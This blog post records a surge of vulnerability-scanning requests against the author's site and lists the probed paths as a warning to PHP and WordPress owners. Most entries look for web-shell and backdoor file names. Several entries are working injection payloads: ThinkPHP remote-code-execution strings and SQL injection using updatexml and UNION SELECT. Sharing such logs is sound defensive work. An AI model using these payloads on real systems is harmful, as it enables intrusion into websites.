Weekend Hacking - 2025-04-06

You Can't Come In

Since the creation of our new site we track all the requests we get and the responses returned, and compile them into a unique list. We have always been logging traffic to our site, but this data provides us with an instant overview of what the internet at large wants from our site, and how we response to it. We did this mostly for SEO and quality purposes, but it also gives us some interesting insights into other activity against our site.

This week has been especially busy with hacking requests, or perhaps more accurately requests probing for vulnerabilities. Whilst we regularly see a baseline churn, of about 10 probes a day, the sudden jump to over 500 in the last couple of days caught our attention. Perhaps we caught someone's attention, or perhaps this was just a regular sweep of the internet.

The list of URL's probed is shown below and seems to indicate that the attacks are mostly aimed at PHP and Wordpress sites.

If you own or run such a site, it might be a good idea to check the list below just in case you use any of the extensions or plugins that these attempts seem to be aimed at.

We don't have time right now to dig in and start tracing IP address and so forth and, of course, we don't feel particularly threatened. If we do spend some time doing some investigation, we will update this post or write a new one.

Monday Update

Overnight we got an additional 800 plus requests probing for vulnerabilities. We are not going update the list below, because its getting a bit silly now, but essentially they follow the same pattern.

We also found a web page detailing how to hack a WordPress website. We are not going to list the URL here because we don't want to be linked to know hackers, but a quick search for 'Hack /wordpress/wp-admin' should find something easily.

All interesting stuff.

The List of Probe Requests

GET /.tmb/autoload_classmap.php
GET /.well-known/.well-known/cc.php
GET /.well-known/acme-challenge/about.php
GET /.well-known/acme-challenge/classwithtostring.php
GET /.well-known/acme-challenge/index.php
GET /.well-known/acme-challenge/new.php
GET /.well-known/acme-challenge/parx.php
GET /.well-known/acme-challenge/wso112233.php
GET /.well-known/acme-challenge/xmrlpc.php
GET /.well-known/admin.php
GET /.well-known/as.php
GET /.well-known/cache-compat.php
GET /.well-known/content.php
GET /.well-known/dropdown.php
GET /.well-known/index.php
GET /.well-known/link.php
GET /.well-known/lofmebwd.php
GET /.well-known/lv.php
GET /.well-known/pki-validation/about.php
GET /.well-known/pki-validation/fm.php
GET /.well-known/pki-validation/index.php
GET /.well-known/pki-validation/jp.php
GET /.well-known/pkivalidation/log.php
GET /.well-known/pki-validation/muse.php
GET /.well-known/pki-validation/parx.php
GET /.well-known/pki-validation/pwnd.php
GET /.well-known/pki-validation/siteindex.php
GET /.well-known/pki-validation/wp-login.php
GET /.well-known/pki-validation/xmrlpc.php
GET /.well-known/themes.php
GET /.well-knownold/inputs.php
GET /0x.php
GET /1.php
GET /1234.php
GET /12wudscz.php
GET /13.php
GET /2.php
GET /403.php
GET /aaa.php
GET /about.php
GET /about/function.php
GET /about/wp-conflg.php
GET /admin.php
GET /admin.php?520
GET /admin/atomlib.php
GET /admin/autoload_classmap.php
GET /admin/controller/extension/extension/blue.php
GET /admin/editor/engine.php
GET /admin/fckeditor/editor/filemanager/alfanew.php
GET /admin/fckeditor/editor/filemanager/owlmailer.php
GET /admin/fckeditor/editor/filemanager/updates.php
GET /admin/function.php
GET /admin/images/slider/CUfcfoH.php
GET /admin/ty.php
GET /admin/upload/themes-install.php
GET /admin/uploads/lv.php
GET /admin/uploads/media.php
GET /adminer.php
GET /alfa.php
GET /ALFA_DATA/index.php
GET /alfanew.php7
GET /Assets/admin.php
GET /Assets/edit.php
GET /assets/images/28c5400b0b.php
GET /assets/images/about.php
GET /assets/images/doc.php
GET /assets/images/wp-login.php
GET /Assets/item.php
GET /assets/plugins/jquery-file-upload/server/php/include.php
GET /bak.php
GET /bg/xmrlpc.php
GET /block-bindings.php
GET /browse.php
GET /bs1.php
GET /buy.php
GET /byp.php
GET /cgi-bin/1.php
GET /cgi-bin/about.php
GET /cgi-bin/admin.php
GET /cgi-bin/fm.php
GET /cgi-bin/moon.php
GET /cgi-bin/upfile.php
GET /cgi-bin/xmrlpc.php
GET /chosen.php
GET /classwithtostring.php
GET /classwithtostring.php/rbzccnnp.php/
GET /click.php
GET /colors.php
GET /config.php
GET /config.php7
GET /cong.php
GET /content.php
GET /css.php
GET /css/chosen.php
GET /css/cloud.php
GET /css/cong.php
GET /css/index.php
GET /css/install.php
GET /css/item.php
GET /css/xp.php
GET /db.php
GET /default.php
GET /doc.php
GET /dropdown.php
GET /ds.php
GET /edit.php
GET /epinyins.php
GET /file.php
GET /fileManage/index.php?path=./
GET /filemanager.php
GET /files/log.php
GET /fm.php
GET /footer.php
GET /function.php
GET /fw.php
GET /gecko.php
GET /gecko-new.php
GET /gel4y.php
GET /goat1.php
GET /goods.php
GET /hehe.php
GET /images/404.php
GET /images/about.php
GET /images/admin.php
GET /images/autoload_classmap.php
GET /images/chosen.php
GET /images/cjfuns.php
GET /images/lmfi2.php
GET /images/stories/admin-post.php
GET /include/mail.php
GET /include/wp-configs.php
GET /index.php/module/action/param1/$%7B@print(md5(2333))%7D
GET /index.php?ids[0,UpdAtexml(0,ConcAt(0xa,Md5(520)),0)]=1
GET /index.php?money[]=1123&user=liao&id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,(select%20md5(520)),0x7e),1))
GET /index.php?s=/home/article/view_recent/name/1
GET /index.php?s=/home/order/cancel/id/1%27
GET /index.php?s=/home/order/complete/id/1%27
GET /index.php?s=/home/order/detail/id/1%27
GET /index.php?s=/home/pay/chongzhi/orderid/1%27
GET /index.php?s=/home/pay/index/orderid/1%27)UnIoN/**/All/**/SeLeCT/**/Md5(2333)--+
GET /index.php?s=/home/service/index/id/1%27
GET /index.php?s=/home/shopcart/getpriceNum/id/1%27
GET /index.php?s=/home/shopcart/getPricetotal/tag/1%27
GET /index.php?s=/home/user/cut/id/1%27
GET /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=var_dump&vars[1][]=((md5(2333))
GET /index.php?s=index/\think\Request/input&filter=var_dump&data=md5(2333)
GET /index.php?s=index/\think\template\driver\file/write&cacheFile=mqz.php&content=%3C?php%20var_dump(md5(2333));?%3E
GET /index.php?s=index/\think\view\driver\Php/display&content=%3C?php%20var_dump(md5(2333));?%3E
GET /index.php?s=index/think\app/invokefunction&function=phpinfo&vars[0]=-1
GET /index.php?s=my-show-id-\x5C..\x5CTpl\x5C8edy\x5CHome\x5Cmy_1{~var_dump(md5(2333))}]
GET /index.php?s=my-show-id-\x5C..\x5CTpl\x5C8edy\x5CHome\x5Cmy_1{~var_dump(md5(2333))}]/index.php?s=my-show-id-\x5C..\x5CRuntime\x5CLogs\x5C25_04_06.log'
GET /index/about.php
GET /index/function.php
GET /index/index.php
GET /index/lock.php
GET /index/x.php
GET /info.php
GET /ini.php
GET /inputs.php
GET /install.php
GET /item.php
GET /js/fm.php
GET /js/style.php
GET /k.php
GET /libraries/legacy/info.php
GET /link.php
GET /lock.php
GET /m.php
GET /mah.php
GET /mah/function.php
GET /makeasmtp.php
GET /manager.php
GET /max.php
GET /menu.php
GET /modules/mod_simplefileuploadv1.3/elements/filemanager.php
GET /moon.php
GET /mqz.php
GET /network.php
GET /Ny1h478.php
GET /ok.php
GET /ova.php
GET /packed.php
GET /past.php
GET /phpmyadmin
GET /plugin.php
GET /plugins/DaoZM.php
GET /plugins/phpThumb/404.php
GET /post.php
GET /public/makeasmtp.php
GET /radio.php
GET /randkeyword.php
GET /readme.php
GET /shell.php
GET /shell20211028.php
GET /shop/lock.php
GET /sim.php
GET /simple.php
GET /spip.php
GET /system.php
GET /test.php
GET /th/plugins/phpThumb/404.php
GET /theme.php
GET /themes.php
GET /ty.php
GET /upload/wp-info.php
GET /uploaded_script.php
GET /uploads/test.php
GET /user.php
GET /WordPress/wp-admin/includes/zmFM.php
GET /wordpress/wp-admin/includeswp-conflg.php
GET /wordpress/wp-includes/wp-config-sample.php
GET /wp.php
GET /wp-2019.php
GET /wp-aa.php
GET /wp-admin/admin-post.php
GET /wp-admin/autoload_classmap.php
GET /wp-admin/byp.php
GET /wp-admin/chosen.php
GET /wp-admin/classwithtostring.php
GET /wp-admin/css/about.php
GET /wp-admin/css/autoload_classmap.php
GET /wp-admin/css/colors/blue/atomlib.php
GET /wp-admin/css/colors/blue/index.php
GET /wp-admin/css/colors/blue/lock.php
GET /wp-admin/css/colors/blue/moon.php
GET /wp-admin/css/colors/blue/wp-login.php
GET /wp-admin/css/colors/classwithtostring.php
GET /wp-admin/css/colors/coffee/about.php
GET /wp-admin/css/colors/coffee/alfa-rex.php
GET /wp-admin/css/colors/ectoplasm/wp-login.php
GET /wp-admin/css/colors/index.php
GET /wp-admin/css/index.php
GET /wp-admin/css/wp-conflg.php
GET /wp-admin/date.php
GET /wp-admin/function.php
GET /wp-admin/images/
GET /wp-admin/images/about.php
GET /wp-admin/images/admin.php
GET /wp-admin/images/alfa-rex.php
GET /wp-admin/images/index.php
GET /wp-admin/images/install.php
GET /wp-admin/images/users.php
GET /wp-admin/images/wp-login.php
GET /wp-admin/includes/cong.php
GET /wp-admin/includes/index.php
GET /wp-admin/includes/install.php
GET /wp-admin/includes/m.php
GET /wp-admin/includes/wp-conflg.php
GET /wp-admin/includes/xmrlpc.php
GET /wp-admin/index.php
GET /wp-admin/install.php
GET /wp-admin/item.php
GET /wp-admin/js/about.php
GET /wp-admin/js/admin.php
GET /wp-admin/js/alfa-rex.php
GET /wp-admin/js/chosen.php
GET /wp-admin/js/index.php
GET /wp-admin/js/widgets/index.php
GET /wp-admin/js/widgets/xmrlpc.php
GET /wp-admin/js/wp-conflg.php
GET /wp-admin/js/wp-login.php
GET /wp-admin/log.php
GET /wp-admin/mah.php
GET /wp-admin/maint/about.php
GET /wp-admin/maint/buy.php
GET /wp-admin/maint/wp-login.php
GET /wp-admin/media.php
GET /wp-admin/network/about.php
GET /wp-admin/network/admin.php
GET /wp-admin/network/chosen.php
GET /wp-admin/network/index.php
GET /wp-admin/network/lock.php
GET /wp-admin/network/shell.php
GET /wp-admin/network/upfile.php
GET /wp-admin/network/wp-conflg.php
GET /wp-admin/packed.php
GET /wp-admin/plugin.php
GET /wp-admin/setup-config.php
GET /wp-admin/tools.php
GET /wp-admin/update.php
GET /wp-admin/upgrade.php
GET /wp-admin/user/admin.php
GET /wp-admin/user/autoload_classmap.php
GET /wp-admin/user/bak.php
GET /wp-admin/user/chosen.php
GET /wp-admin/user/content.php
GET /wp-admin/user/file.php
GET /wp-admin/user/index.php
GET /wp-admin/wp-admin.php
GET /wp-admin/wp-conflg.php
GET /wp-configs.php
GET /wp-config-sample.php
GET /wp-content/
GET /wp-content/about.php
GET /wp-content/admin.php
GET /wp-content/autoload_classmap.php
GET /wp-content/bk.php
GET /wp-content/blue.php
GET /wp-content/classwithtostring.php
GET /wp-content/config.php
GET /wp-content/configs.php
GET /wp-content/content.php
GET /wp-content/file.php
GET /wp-content/function.php
GET /wp-content/index.php
GET /wp-content/json.php
GET /wp-content/languages/asus.php
GET /wp-content/languages/chosen.php
GET /wp-content/languages/index.php
GET /wp-content/languages/link.php
GET /wp-content/languages/wp-login.php
GET /wp-content/mah.php
GET /wp-content/mu-plugins/gecko.php
GET /wp-content/mu-plugins/index.php
GET /wp-content/packed.php
GET /wp-content/plugin.php
GET /wp-content/plugins/
GET /wp-content/plugins/about.php
GET /wp-content/plugins/admin.php
GET /wp-content/plugins/background-image-cropper/plugins.php
GET /wp-content/plugins/Cache.php
GET /wp-content/plugins/Cache/Cache.php
GET /wp-content/plugins/Cache/footer.php
GET /wp-content/plugins/core-plugin/file-manager.php
GET /wp-content/plugins/dummyyummy/wp-signup.php
GET /wp-content/plugins/duplicator/assets/about.php
GET /wp-content/plugins/elementor/about.php
GET /wp-content/plugins/hellopress/wp_filemanager.php
GET /wp-content/plugins/index.php
GET /wp-content/plugins/pwnd/classwithtostring.php
GET /wp-content/plugins/pwnd/gecko.php
GET /wp-content/plugins/revslider/includes/external/page/index.php
GET /wp-content/plugins/revslider/public/assets/assets/sources/wp-login.php
GET /wp-content/plugins/seoplugins/index.php
GET /wp-content/plugins/seoplugins/mar.php
GET /wp-content/plugins/seoplugins/wso112233.php
GET /wp-content/plugins/WordPressCore/
GET /wp-content/plugins/WordPressCore/alfa-rex.php
GET /wp-content/plugins/wp.php
GET /wp-content/plugins/wp-automatic/inc/csv.php
GET /wp-content/plugins/wp-help/index.php
GET /wp-content/plugins/wp-help/mini.php
GET /wp-content/plugins/wp-login.php
GET /wp-content/plugins/xmrlpc.php
GET /wp-content/themes/aahana/json.php
GET /wp-content/themes/about.php
GET /wp-content/themes/astra/inc/fm.php
GET /wp-content/themes/astra/inc/ki1k.php
GET /wp-content/themes/astra/inc/network.php
GET /wp-content/themes/cay-van-phong/3luaO.php
GET /wp-content/themes/cay-van-phong/filemanager.php
GET /wp-content/themes/classic/inc/json.php
GET /wp-content/themes/file.php
GET /wp-content/themes/include.php
GET /wp-content/themes/index.php
GET /wp-content/themes/plugin.php
GET /wp-content/themes/seotheme/classwithtostring.php
GET /wp-content/themes/sketch/404.php
GET /wp-content/themes/travelscape/json.php
GET /wp-content/themes/twenty/twenty.php
GET /wp-content/themes/twentytwentytwo/alfa-rex.php
GET /wp-content/themes/wp-pridmag/admin.php
GET /wp-content/themes/wp-pridmag/classwithtostring.php
GET /wp-content/themes/wp-pridmag/lock.php
GET /wp-content/themes/wp-pridmag/up.php
GET /wp-content/themes/xmrlpc.php
GET /wp-content/upgrade/about.php
GET /wp-content/upgrade/admin.php
GET /wp-content/upgrade/autoload_classmap.php
GET /wp-content/upgrade/info.php
GET /wp-content/upgrade/shell.php
GET /wp-content/upgrade/wp-sigunq.php
GET /wp-content/upgrade-temp-backup/about.php
GET /wp-content/upgrade-temp-backup/alfa-rex.php
GET /wp-content/upgrade-temp-backup/ty.php
GET /wp-content/upgrade-temp-backup/wp-login.php
GET /wp-content/uploads/2020/admin.php
GET /wp-content/uploads/2022/update.php
GET /wp-content/uploads/2023/05/autoload_classmap.php
GET /wp-content/uploads/2023/10/autoload_classmap.php
GET /wp-content/uploads/2024/index.php
GET /wp-content/uploads/423_index.php
GET /wp-content/uploads/admin.php
GET /wp-content/uploads/autoload_classmap.php
GET /wp-content/uploads/chosen.php
GET /wp-content/uploads/classwithtostring.php
GET /wp-content/uploads/file.php
GET /wp-content/uploads/index.php
GET /wp-content/uploads/json.php
GET /wp-content/uploads/link.php
GET /wp-content/uploads/plugins.php
GET /wp-content/uploads/wp-conflg.php
GET /wp-content/wp-configs.php
GET /wp-content/wp-login.php
GET /wp-includes/assets/about.php
GET /wp-includes/assets/autoload_classmap.php
GET /wp-includes/assets/file.php
GET /wp-includes/assets/index.php
GET /wp-includes/assets/themes.php
GET /wp-includes/autoload_classmap.php
GET /wp-includes/block-patterns/about.php
GET /wp-includes/block-patterns/autoload_classmap.php
GET /wp-includes/block-patterns/index.php
GET /wp-includes/block-patterns/vuln.php
GET /wp-includes/blocks/autoload_classmap.php
GET /wp-includes/blocks/edit.php
GET /wp-includes/blocks/heading/autoload_classmap.php
GET /wp-includes/blocks/loginout/
GET /wp-includes/blocks/more/
GET /wp-includes/blocks/shortcode/
GET /wp-includes/blocks/wp-conflg.php
GET /wp-includes/block-supports/about.php
GET /wp-includes/block-supports/autoload_classmap.php
GET /wp-includes/block-supports/variations.php
GET /wp-includes/certificates/about.php
GET /wp-includes/certificates/autoload_classmap.php
GET /wp-includes/certificates/index.php
GET /wp-includes/certificates/up.php
GET /wp-includes/certificates/wp-login.php
GET /wp-includes/css/about.php
GET /wp-includes/css/alfa-rex.php
GET /wp-includes/css/dist/
GET /wp-includes/css/dist/edit-widgets/
GET /wp-includes/css/dist/preferences/index.php
GET /wp-includes/css/wp-conflg.php
GET /wp-includes/css/wp-login.php
GET /wp-includes/customize/autoload_classmap.php
GET /wp-includes/customize/index.php
GET /wp-includes/customize/muse.php
GET /wp-includes/customize/shell.php
GET /wp-includes/customize/wp-conflg.php
GET /wp-includes/customize/wp-login.php
GET /wp-includes/fonts/about.php
GET /wp-includes/fonts/admin.php
GET /wp-includes/fonts/index.php
GET /wp-includes/fonts/install.php
GET /wp-includes/fonts/item.php
GET /wp-includes/html-api/about.php
GET /wp-includes/html-api/alfa-rex.php
GET /wp-includes/html-api/chosen.php
GET /wp-includes/html-api/cloud.php
GET /wp-includes/html-api/index.php
GET /wp-includes/html-api/wp-conflg.php
GET /wp-includes/html-api/wp-login.php
GET /wp-includes/ID3/about.php
GET /wp-includes/ID3/autoload_classmap.php
GET /wp-includes/ID3/index.php
GET /wp-includes/images/about.php
GET /wp-includes/images/autoload_classmap.php
GET /wp-includes/images/chosen.php
GET /wp-includes/images/crystal/about.php
GET /wp-includes/images/media/about.php
GET /wp-includes/images/media/text.php
GET /wp-includes/images/media/wp-login.php
GET /wp-includes/images/smilies/about.php
GET /wp-includes/images/smilies/index.php
GET /wp-includes/images/smilies/network.php
GET /wp-includes/images/smilies/wp-login.php
GET /wp-includes/images/wlw/wp-login.php
GET /wp-includes/index.php
GET /wp-includes/IXR/about.php
GET /wp-includes/IXR/alfa-rex.php
GET /wp-includes/IXR/shell.php
GET /wp-includes/js/about.php
GET /wp-includes/js/alfa-rex.php
GET /wp-includes/js/codemirror/about.php
GET /wp-includes/js/codemirror/index.php
GET /wp-includes/js/crop/
GET /wp-includes/js/crop/shell.php
GET /wp-includes/js/crop/zmFM.php
GET /wp-includes/js/tinymce/skins/lightgray/img/about.php
GET /wp-includes/js/tinymce/skins/wordpress/images/about.php
GET /wp-includes/js/tinymce/skins/wordpress/images/wp-login.php
GET /wp-includes/js/wp-login.php
GET /wp-includes/lock.php
GET /wp-includes/mah.php
GET /wp-includes/network.php
GET /wp-includes/packed.php
GET /wp-includes/php-compat/chosen.php
GET /wp-includes/php-compat/content.php
GET /wp-includes/pomo/chosen.php
GET /wp-includes/pomo/install.php
GET /wp-includes/pomo/rk2.php
GET /wp-includes/random_compat/about.php
GET /wp-includes/random_compat/chosen.php
GET /wp-includes/Requests/autoload_classmap.php
GET /wp-includes/Requests/Cookie/wp-login.php
GET /wp-includes/Requests/file.php
GET /wp-includes/Requests/Response/siteindex.php
GET /wp-includes/Requests/Response/wp-login.php
GET /wp-includes/Requests/Utility/alfa-rex.php
GET /wp-includes/Requests/Utility/cc.php
GET /wp-includes/rest-api/admin.php
GET /wp-includes/rest-api/alfa-rex.php
GET /wp-includes/rest-api/autoload_classmap.php
GET /wp-includes/rest-api/blue.php
GET /wp-includes/rest-api/endpoints/index.php
GET /wp-includes/rest-api/fields/index.php
GET /wp-includes/rest-api/wp-login.php
GET /wp-includes/SimplePie/about.php
GET /wp-includes/SimplePie/Cache/about.php
GET /wp-includes/SimplePie/Cache/content.php
GET /wp-includes/SimplePie/Content/Type/alfa-rex.php
GET /wp-includes/SimplePie/Content/Type/index.php
GET /wp-includes/SimplePie/Content/Type/wp-login.php
GET /wp-includes/SimplePie/Decode/wp-login.php
GET /wp-includes/SimplePie/file.php
GET /wp-includes/SimplePie/system.php
GET /wp-includes/SimplePie/wp-conflg.php
GET /wp-includes/sitemaps/about.php
GET /wp-includes/sitemaps/alfa-rex.php
GET /wp-includes/sitemaps/autoload_classmap.php
GET /wp-includes/sitemaps/providers/about.php
GET /wp-includes/sitemaps/providers/index.php
GET /wp-includes/sodium_compat/alfa-rex.php
GET /wp-includes/sodium_compat/autoload_classmap.php
GET /wp-includes/sodium_compat/index.php
GET /wp-includes/sodium_compat/link.php
GET /wp-includes/sodium_compat/src/alfa-rex.php
GET /wp-includes/sodium_compat/src/content.php
GET /wp-includes/sodium_compat/src/Core32/Curve25519/Ge/about.php
GET /wp-includes/sodium_compat/src/index.php
GET /wp-includes/sodium_compat/wp-login.php
GET /wp-includes/style-engine/about.php
GET /wp-includes/style-engine/autoload_classmap.php
GET /wp-includes/style-engine/content.php
GET /wp-includes/style-engine/gecko-new.php
GET /wp-includes/style-engine/index.php
GET /wp-includes/style-engine/wp-login.php
GET /wp-includes/Text/alfa-rex.php
GET /wp-includes/Text/Diff/about.php
GET /wp-includes/Text/Diff/alfa-rex.php
GET /wp-includes/Text/Diff/Engine/about.php
GET /wp-includes/Text/Diff/Engine/index.php
GET /wp-includes/Text/Diff/Engine/wp-login.php
GET /wp-includes/Text/Diff/Renderer/about.php
GET /wp-includes/Text/Diff/Renderer/wp-login.php
GET /wp-includes/Text/index.php
GET /wp-includes/Text/network.php
GET /wp-includes/Text/wp.php
GET /wp-includes/Text/wp-conflg.php
GET /wp-includes/theme-compat/about.php
GET /wp-includes/theme-compat/autoload_classmap.php
GET /wp-includes/theme-compat/chosen.php
GET /wp-includes/theme-compat/index.php
GET /wp-includes/theme-compat/wp-conflg.php/wp-content/plugins/google-seo-rank/index.php
GET /wp-includes/theme-compat/wp-login.php
GET /wp-includes/widgets/parx.php
GET /wp-includes/wp-includes/about.php
GET /wp-includes/wp-includes/alfa-rex.php
GET /wp-index.php
GET /wp-links.php
GET /wp-login.php
GET /wp-mail.php/wp-includes/ID3/.info.php
GET /wp-mail.php/wp-includes/ID3/class-config.php
GET /wp-mail.php/wp-includes/ID3/Core32.php
GET /wp-mail.php/wp-includes/ID3/esyfvxgmdq.php
GET /wp-mail.php/wp-includes/ID3/info.php
GET /wp-mail.php/wp-includes/ID3/rk2.php
GET /wp-mail.php/wp-includes/ID3/rnEPv9.php
GET /wp-mail.php/wp-includes/ID3/taptap-null.php
GET /wp-mail.php/wp-includes/ID3/wp-mail.php
GET /wp-trackback.php
GET /x.php
GET /xcc.php
GET /xmlrpc.php
GET /xmrlpc.php
GET /zppooho.php
HEAD /wp
POST /index.php
POST /index.php/Home/Index/index.html
POST /index.php/index
POST /index.php?s=/home/user/checkcode/
POST /index.php?s=captcha
POST /index.php?s=index/index/index
POST /public/index.php

Weekend Hacking - 2025-04-06

You Can't Come In

Monday Update

The List of Probe Requests

Blog Tags